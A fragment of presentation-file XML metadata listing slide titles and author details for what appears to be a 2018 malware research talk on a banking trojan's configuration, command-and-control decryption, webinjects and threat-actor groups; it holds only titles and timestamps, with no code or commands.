      <vt:lpstr>BaseConfig Keys</vt:lpstr>
      <vt:lpstr>BaseConfig C2s (2.1.0 – 2.5.7)</vt:lpstr>
      <vt:lpstr>BaseConfig C2s (2.6.x - present)</vt:lpstr>
      <vt:lpstr>BaseConfig C2s</vt:lpstr>
      <vt:lpstr>BaseConfig DGA Endings</vt:lpstr>
      <vt:lpstr>DGA</vt:lpstr>
      <vt:lpstr>DGA (2.2.1 – 2.2.9)</vt:lpstr>
      <vt:lpstr>DGA (2.2.10 – present)</vt:lpstr>
      <vt:lpstr>DGA Activity (1 config / ~Oct 2018)</vt:lpstr>
      <vt:lpstr>Command and Control (Requests)</vt:lpstr>
      <vt:lpstr>Request URI (2.1.0 – 2.1.3)</vt:lpstr>
      <vt:lpstr>Request URI (2.2.1 – present)</vt:lpstr>
      <vt:lpstr>POST Data Decryption</vt:lpstr>
      <vt:lpstr>POST Data Decryption (2.1.0 – 2.1.3)</vt:lpstr>
      <vt:lpstr>POST Data Decryption (2.2.1 – present)</vt:lpstr>
      <vt:lpstr>Request Data</vt:lpstr>
      <vt:lpstr>Command and Control (Response)</vt:lpstr>
      <vt:lpstr>Response Data Decryption Layer 1 (2.1.0 - 2.1.3)</vt:lpstr>
      <vt:lpstr>Response Data Decryption Layer 1 (2.2.1 - present)</vt:lpstr>
      <vt:lpstr>Decrypt Me Like One of your BaseConfigs (Layer 2)</vt:lpstr>
      <vt:lpstr>Decrypt Me Like One of your BaseConfigs (Layer 3)</vt:lpstr>
      <vt:lpstr>Dynamic Config</vt:lpstr>
      <vt:lpstr>Dynamic Botnets (“botnet“)</vt:lpstr>
      <vt:lpstr>“keylog_process” and “screen_process”</vt:lpstr>
      <vt:lpstr>Man-in-the-Browser Module (“url_plugin_webinjectXX”)</vt:lpstr>
      <vt:lpstr>Webinjects (“url_webinjects”)</vt:lpstr>
      <vt:lpstr>Webinjects (“webfilters”)</vt:lpstr>
      <vt:lpstr>Webinjects (“webinjects”)</vt:lpstr>
      <vt:lpstr>Webinjects (“webinjectXdata”)</vt:lpstr>
      <vt:lpstr>Webinjects for Humans</vt:lpstr>
      <vt:lpstr>Zeus BinStorage</vt:lpstr>
      <vt:lpstr>Webinjects (Targeted Countries)</vt:lpstr>
      <vt:lpstr>Webinjects (Types)</vt:lpstr>
      <vt:lpstr>Webinjects (Defaults / Tests)</vt:lpstr>
      <vt:lpstr>Webinjects Kits (tables)</vt:lpstr>
      <vt:lpstr>Webinjects Kits (.::grab)</vt:lpstr>
      <vt:lpstr>Webinjects Kits (r=)</vt:lpstr>
      <vt:lpstr>Take Warning</vt:lpstr>
      <vt:lpstr>Take Warning</vt:lpstr>
      <vt:lpstr>Grouping</vt:lpstr>
      <vt:lpstr>Groups (IOC Overlap)</vt:lpstr>
      <vt:lpstr>Groups (BaseConfig Key Hashes)</vt:lpstr>
      <vt:lpstr>Group (“First Contact”)</vt:lpstr>
      <vt:lpstr>Group (“First Contact”)</vt:lpstr>
      <vt:lpstr>Group (“First Contact”)</vt:lpstr>
      <vt:lpstr>Group (“Italian Job”)</vt:lpstr>
      <vt:lpstr>Group (“Italian Job”)</vt:lpstr>
      <vt:lpstr>Group (“Italian Job”)</vt:lpstr>
      <vt:lpstr>Group (“Italian Job”)</vt:lpstr>
      <vt:lpstr>Group (“Japan Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Japan Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Japan Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Emotet Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Emotet Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Hancitor Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Hancitor Gang”)</vt:lpstr>
      <vt:lpstr>Group (“Hancitor Gang”)</vt:lpstr>
      <vt:lpstr>Group (“NOP Gang”)</vt:lpstr>
      <vt:lpstr>Group (“NOP Gang”)</vt:lpstr>
      <vt:lpstr>Group (“NOP Gang”)</vt:lpstr>
      <vt:lpstr>Endangered Species ?</vt:lpstr>
      <vt:lpstr>Endangered Species ?</vt:lpstr>
      <vt:lpstr>Zoo</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>@tildedennis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Kearney</dc:creator>
  <cp:lastModifiedBy>Dennis Schwarz</cp:lastModifiedBy>
  <cp:revision>521</cp:revision>
  <cp:lastPrinted>2016-03-05T01:06:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-27T17:23:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-04T07:17:40Z</dcterms:modified>
</cp:coreProperties>
</file>